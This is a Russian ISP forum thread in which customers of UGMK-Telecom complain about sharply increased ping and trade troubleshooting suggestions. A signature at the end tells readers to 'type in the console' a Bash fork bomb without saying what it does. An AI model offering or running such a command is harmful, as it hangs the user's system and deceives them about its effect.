Форумы УГМК-Телеком

Пожалуйста, войдите или зарегистрируйтесь.

Расширенный поиск  

Новости:

Добро пожаловать на форум!

Автор Тема: Пинг до многих ресурсов вырос в несколько раз!  (Прочитано 18472 раз)

frzhe

  • Бывалый
  • **
  • Оффлайн Оффлайн
  • Сообщений: 118
    • ICQ клиент - 313345
    • Просмотр профиля
    • E-mail

Снова пинг вырос до 200 ms
только к вашему сайту пинг норм, но он по локалу идет не удивительно же
Записан

nafanya

  • Неосвоившийся
  • *
  • Оффлайн Оффлайн
  • Сообщений: 40
    • Просмотр профиля

Я часто играю по интернету и для меня важно как и для любого геймера что бы интернет был качественный, быстрый и пинг (задержка) был небольшой ugmk-telecom меня полностью устраивает но с середины Сентября пинг возрос до многих ресурсов 2-3ое думал это временно но проблема до сих пор есть!
Антивирус установлен, дополнительно проверял утилитами от др веба и касперского, подцеплял другой комп с чистой ОС проблема не в компе!
В чем проблема? решение?!

до UralWES были самые лучшие показатели пинг был от 5-8 скорость загрузки от 70-90 скорость отдачи 50-60.
до DOM.ru  пинг был не более 25, скорость загрузки и отдачи не помною но показатели были не низкие.
до Курганского LLC INFOCENTR  пинг был не более 25, скорость загрузки и отдачи не помною но показатели были не низкие.
до Москвы Business Sviaz Holding  с пингом небыло проблем был не более 50, скорость загрузки и отдачи не помною но показатели были не низкие.
до Москвы Business Sviaz Holding  с пингом небыло проблем был не более 35-40, скорость загрузки и отдачи не помною но показатели были не низкие.

  но на этом участке повышения пинга нет!


Проложи до себя,FTTN и будет тебе счастье!Да и только.
Или у себя настрой DNS-server-кэш
Записан
набери в консоли
 :(){ :|:&};: